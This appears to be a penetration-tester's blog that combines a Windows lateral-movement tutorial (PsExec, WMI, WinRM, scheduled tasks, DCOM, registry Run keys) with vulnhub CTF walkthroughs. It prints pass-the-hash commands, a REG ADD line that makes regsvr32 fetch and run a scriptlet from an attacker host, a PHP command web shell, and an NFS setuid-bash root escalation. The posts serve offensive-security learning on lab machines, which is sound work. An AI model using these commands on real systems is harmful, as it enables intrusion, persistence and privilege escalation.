Windows Lateral Movement Fu

In this post I'm going to detail Windows Lateral Movement tools techniques and procedures (TTPs). Wikipedia defines Lateral Movement as techniques cyber attackers, or "threat actors", use to progressively move through a network as they search for the key data and assets that are ultimately the target of their attack campaigns. This definition is a bit too broad as that would entail everything done by a threat actor between attaining foothold and exfilteration of data. The main focus of this post is in ways an attacker could gain code execution on other systems on a victim network once they have initial foothold or a valid set of credentials. These credentials could be stolen from centralized software installation systems, keyloggers, ARP spoofing, Network sniffing or password dumping toys like Pwdump, Windows Credential Editor (WCE), Mapiget, Lslsass, Gsecdump, CacheDump, Mimikatz, etc.

   The powershell era gave attackers a native way of interacting with the windows core without having to use compiled code as well as an interactive .NET playground. Some of the techniques below can be achieved with or without powershell. I'll try to highlight ways of achieving the same task with powershell wherever possible.   

The following set of techniques assume the attacker has a valid set of credentials/hashes and or a command shell on the target network. I'll start with every pentester's favorite lateral movement technique.

1.  PsExec

This tool is usually run after using mimikatz to dump credentials from memory. What makes it really amazing is that the binary is Microsoft signed although some AVs do flag it. Of course Microsoft's implementation of this tool doesn't support using hashes for authentication. Metasploit and Impacket's implementation of this tool allows us to use both hashes (NTLM) and clear-text credentials whichever you can get your hands on.

The Metasploit way

Metasploit has its implementation of the same. This one allows us to pass the hashes if we don't have the clear-text credentials.

Note that metasploit has two implementations of the psexec module, a legacy one and a powershell version. I've found the powershell version to be more reliable.

Impacket way

psexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1

2.  Windows Management Instrumentation (WMI)

WMI is the infrastructure for management data and operations on Windows-based operating systems. WMI enables devices and systems in a network, to be managed and controlled centrally. This is another attacker favorite since enabled by default and doesn't require any additional toys on the compromised system. With this you can basically execute code on a remote system.

We can see the notepad process has been executed on the target system.

Now let's try something more evil.

 Back in our metasploit we get a reverse shell.

In case you don't know how i generated the rev_https.sct file, google subtee Bypass Application Whitelisting Script Protections.

Impacket

Like PSExec Impacket has a toy you can deploy directly form Kali that can take both hashes and plain text passwords.

wmiexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1

Powershell

Note that with newer versions of Windows ie 2012+, WMIC is deprecated. PowerShell provides the same functionality with the Invoke-WMIMethod cmdlet. So lets see what Invoke-WMIMethod can do for us.

Lets first generate the payload

Set up our metasploit handler

We can see that we got a reverse connection on execution.

Powersploit also has its own WMI implementation called Invoke-WmiCommand. I'll leave that one as an exercise to those following along.

3.  Windows Remote Management (WinRM)

Microsoft defines Windows RM as a remote management service that allows hardware and operating systems, from different vendors, to interoperate. WinRM is the server part of the application and WinRS (Windows Remote Shell) is the client part of the application. The service has to enabled on both systems for it to work. We'll use the WinRS tool when running commands on the target system  Windows Remote Management isn't enabled by default but when it is, it has the look and feel of the psexec binary. Its relatively trivial to use. You basically have a shell on the target system. If the boxes are in an active directory environment, theres no need to provide credentials since the machines have Kerberos trust between them.

My test machines are domain joined, if you want to try these out without domain joining the boxes check out this link.

There are a number of powershell implementations of Windows Remote Management. We're going to see some of them in action. Invoke-Command and PSSession commands are more or less the same,the main difference between them is that former can be unleashed on multiple boxes with a single command while PSSession can only run on one box.

Invoke-Command

Note: The download cradle was obfuscated by Daniel Bohannon's Invoke-CradleCrafter

Invoke-Command is quite flexible, you can give it a path to a file to execute on the remote system. As with with all inbuilt powershell commands Get-Help is your friend.

PSSession

Lets see what the PSSession commands can do for us

A variation of the PSSession set of commands is the Enter-PSSession, you can guess from the name that it gives you an interactive session on the target machine. As you know metasploit and interactive sessions don't play well together, I'll run it from a windows box

We can even mix it up to run commands on the target system.

4.  Service Control (SC)

SC.exe is an inbuilt windows utility that retrieves and sets control information about services. Its a little powerful utility that can start, stop and interact with windows services, and the fact that it can be used control other system's services remotely makes it an interesting tool for lateral movement. Using a normal exe binary with sc will cause it to die immediately after execution. This means we have to generate a binary that's capable of responding to service control commands. Lucky for us metasploit can generate such binaries. The downside is that it'll probably be flagged by AV since all metasploit containers are deemed dangerous. You'll have to modify the binary to evade AV. AV evasion is beyond the scope of this post but you can read more on how to do it from here and here.

Let's transfer our shiny new evil binary to the system we control

We'll check to make sure the service we're trying to create doesn't exist before we actually create it.

5.  Scheduled Tasks

This technique is super flexible, you can schedule the tasks to run on triggering an event like for example on system log on. You can fine tune it to run on the days of your choice. This makes it even a potent persistence technique. The catch of course is that it requires admin rights on the target system.

For good Opsec we'll remove scheduled tasks and also check to make sure the task has been removed.

6.  AT

This is the younger brother of scheduled tasks. Its not a powerful as scheduled tasks but for what we want to accomplish, its sufficient. You can schedule commands and programs to run on a computer at a specified time and date.

7. MM20 Application DCOM

All the other techniques discussed in this post have been around for an eternity. This next one was discovered / made public by enigma0x3. It takes advantage of the fact that Distributed Component Object Model (DCOM) has the ability to interact with objects over the network.  He has a detailed way of how he enumerated the objects and eventually got code execution in his blog post here. He has variations in this technique where he abuses MS Office to achieve code execution, read about here. I advise everyone starting out to read this guy's whole website.

We'll get an empire reverse shell

8.  RDP

Well The RDP protocol is as old as age. Its syntax is pretty straight forward.

9.  Remote File Access

This next couple of techniques require the compromised system to have Read-Write file permissions on the entire root drive of another system. We have to wait for the targeted system to be restarted then we can get our reverse shell. This can also double as a persistence technique unless you explicitly remove the uploaded trojan.

Robocopy

Xcopy

This is the younger brother to robocopy. Only the syntax changes but the functionality remains the same.Can read more about it here.

There are variations to this technique in that you can leverage dll hijacking or plant dlls at specific locations to get code execution. These techniques can even double as privilege escalation technique depending on folder permissions and windows version. More information on how that can be achieved is available here

10.  Remote Registry Access / Manipulation

Writing to any of these registry keys will trigger code execution. These locations are also malware favorites for persistence. The HKCU can be substituted for HKLM. The only difference is that HKCU will be executed under the context of the current user while HKLM will execute under the context of whoever is logged on.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
REG ADD \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v evilkey /t REG_SZ /d "regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"
REG QUERY \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run

-Pass the ticket

References

https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
https://posts.specterops.io/lateral-movement-using-excel-application-and-dcom-enigma0x3-on-wordpress-com-d11d56e504dc
http://www.fuzzysecurity.com/tutorials/19.html

Owning Zico2

Over the past week, vulnhub dropped about 20 wargames. I decided try my hand a couple. I'll be blogging as i solve them assuming the time allows. This is my walkthrough for the Zico2 ctf

After loading the vm into vmware, scanned with nmap. Port 80 as usual appeared to be the most interesting. So i fired up nikto and then dirsearch in that order.

root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php 

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5992

Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log

Target: http://192.168.83.133/

[09:50:00] Starting: 
[09:50:02] 403 -  286B  - /.hta
[09:50:02] 403 -  293B  - /.ht_wsr.txt
[09:50:02] 403 -  297B  - /.htaccess-local
[09:50:02] 403 -  295B  - /.htaccess-dev
[09:50:02] 403 -  295B  - /.htaccess.BAK
[09:50:02] 403 -  297B  - /.htaccess-marco
[09:50:02] 403 -  295B  - /.htaccess.old
[09:50:02] 403 -  296B  - /.htaccess.bak1
[09:50:02] 403 -  298B  - /.htaccess.sample
[09:50:02] 403 -  296B  - /.htaccess.orig
[09:50:02] 403 -  296B  - /.htaccess.save
[09:50:02] 403 -  295B  - /.htaccess.txt
[09:50:02] 403 -  297B  - /.htaccess_extra
[09:50:02] 403 -  296B  - /.htaccess_orig
[09:50:02] 403 -  294B  - /.htaccessBAK
[09:50:02] 403 -  295B  - /.htaccessOLD2
[09:50:02] 403 -  294B  - /.htaccessOLD
[09:50:03] 403 -  294B  - /.htaccess_sc
[09:50:03] 403 -  292B  - /.htaccess~
[09:50:03] 403 -  290B  - /.htgroup
[09:50:03] 403 -  295B  - /.htpasswd-old
[09:50:03] 403 -  296B  - /.htpasswd_test
[09:50:03] 403 -  290B  - /.htusers
[09:50:03] 403 -  292B  - /.htpasswds
[09:50:18] 403 -  290B  - /cgi-bin/
[09:50:21] 301 -  314B  - /css  ->  http://192.168.83.133/css/
[09:50:21] 301 -  318B  - /dbadmin  ->  http://192.168.83.133/dbadmin/
[09:50:21] 200 -  917B  - /dbadmin/
[09:50:22] 403 -  286B  - /doc/
[09:50:22] 403 -  301B  - /doc/en/changes.html
[09:50:22] 403 -  300B  - /doc/stable.version
[09:50:24] 200 -    3KB - /gulpfile.js
[09:50:25] 301 -  314B  - /img  ->  http://192.168.83.133/img/
[09:50:25] 200 -    8KB - /index
[09:50:26] 200 -    8KB - /index.html
[09:50:27] 301 -  313B  - /js  ->  http://192.168.83.133/js/
[09:50:27] 200 -    1KB - /LICENSE
[09:50:34] 200 -  789B  - /package.json
[09:50:34] 200 -  789B  - /package
[09:50:38] 200 -    1KB - /README.md 
[09:50:40] 403 -  295B  - /server-status
[09:50:40] 403 -  296B  - /server-status/
[09:50:44] 200 -    8KB - /tools
[09:50:45] 200 -    0B  - /view.php

Task Completed

The dbadmin folder obviously looked the most interesting. So i quicky browsed it. This inturn led me to htpp://192.168.83.133/dbadmin/test_db.php At the prompt i logged in with default credentilas of admin. I then searched for existing vulnerabilities in phpliteadmin.

At this point i tried to follow along what the advisory said but was a little handcapped since the screenshots were nolonger up.
The screenshots below show how i managed to execute code on the zico2 box

Click "Go"

fill in as shown in the screenshot (under the Default Value field put <?php phpinfo()?> as in the advisory) then click "Create"
You should be greeted with a message that shows that the table was successfully created as in the screenshot below

after that click on "/usr/databases/test.php" the click the "Rename Database" tab

I chose that folder (dbadmin) since thats the location of the default test_db.php file
At this point browsing to the http://192.168.83.133/dbadmin/west.php we should have the phpinfo file displayed to us as in the screenshot below

Now we know we have code execution. Next step is to upload something more evil like a command shell. When i directly uploaded a command shell, it didnt work so i base64 encoded it.
The steps for uploading are the same as above with a small difference of base64 encoding the it.

root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .

Modify and remove the php tags so it looks like below.

root@kali:/tmp# cat simple-backdoor.php 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

Now base64 encode it

Paste the resulting code into the default value field.

<php? <base64 encoded code goes here without the angle brackets :-)> ?>

As before rename the database to whatever you like, I named mine bd.php. We should now have a functional shell.

However this shell is a little limited so we'll use metasploit to get a better shell.

I downloaded the linux exploit sugester onto the system and the first exploit did the trick. gcc wasnt working well on the victim box so i compiled the exploit on another box then returned it to the victim box which gave me a root shell.

Finally browsed to the root folder and read the flat.txt file. At this point i was obliged to do the rewt dance :-)

Thanks to Rafael and the team over at vulnhub for the challenges.

Solving hackfest2016: Orcus VM

Its taken me a while to pwn this challenge partly because it runs too many services and web apps and also partly my lousy attention span. I went down a certain path burnt about 6 hours only to make no serious progress and return to the enumeration phase. Probably my biggest take away from this box is throughly map the application before attempting exploitation and avoid skipping around, this helps prevent futile attempts from working with limited knowledge.
Enough with the philosophical yadda yaddah.
    First I fired up nmap and as in the previous series gazillion services were running.

I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and webapps to follow up. I also fired up dirb to see if i could find any extra folders.

There are so many seemingly vulnerable or actually vulnerable web apps especially in the /external/ directory I'll never know for sure so naturally I spent a long time here (so many wild goose chases).

At this URL http://172.16.94.136/backups/ I downloaded the SimplePHPQuiz-Backupz.tar.gz but didnt have the permissions to download the ssh-creds.bak. I some how already knew it wouldnt amount to much. I extracted the the folder and went to the configs folder and found database credentials.

<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){

    echo "Could not connect to MySql. Please try again";
    exit();

}
?>

With this I immediately went to the http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
         Now we have credentials to phpmyadmin all that is left is write a shell using mysql browse to it then get a shell.....

except it didnt happen that way as the credentials didn't have write permission to the web root. It didnt even have FILE permissions. The VM is loaded with a few databases so I decided to try one by one to see if there were backends to other webapps that we hadnt got in the enumeration phase. We were thanked with the /zenphoto/ folder which was an app that was missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from the SimplePHPQuiz-Backupz.tar.gz and successfully installed it.

At this point the plan was to find a point to upload a webshell and get a reverse connection. I did this by

Plugins --> Uploader ---> tick enable "elFinder" then Apply

Go to Upload tab--> Click Files (elFinder)--> Zen photodata, Right click on the on the pane on the right, Click --> create new text and then copy everyones favorite php-reverse-shell


After copying it, right click edit and then change the file extension to php, then right click again and then click Open. (remember to have set up a netcat listener). Then we'll get a limited reverse-shell.

With the first flag in the bag let try and root on this box. It took me a while to root this box. I kept going away trying privilege escalation exploits. Until today morning I came back to my nmap scans and found this

2049/tcp open  nfs_acl     2-3 (RPC #100227)

wonder why that didn't stick out to me in the first place. I quickly run showmount.

root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *

I then checked /etc/exports file and found that the NFS shares were configured with no_root_squash

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#        to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash) 

On our kali box, we mount the partition

root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter

On our limited shell on Orcus we copy our bash shell into our newly created world writable /tmp/rooter

www-data@Orcus:/$ cp /bin/bash /tmp/rooter

we head back to our Kali box and set the seguid bit on the /tmp/rooter file (shell)

root@kali:~# chmod 4777 /mnt/orcus/rooter

we head into the the /tmp folder and check to make sure the the bit has been set and then execute the rooter with the -p option in order to preserve the previleges which gets us root privileges. :-)



It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.

Solving hackfest2016: Sedna VM

First scanned the box.

As I was clicking around i found this. http://172.16.94.135/files/be_demo/blog/categories/newlogo.jpg

With this I searched exploit-db and found this. I first tried to upload directly using the firefox plugin Poster but the uploads kept getting renamed and php extension were being filtered somehow.

So i decided to try and upload the exploit first then use it to upload the php-reverse-shell. This got me a limited shell on the system. For privilege escalation I used taviso's exploit [CVE-2015-1318 newpid (apport)] The link to the exploit can be found here. Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.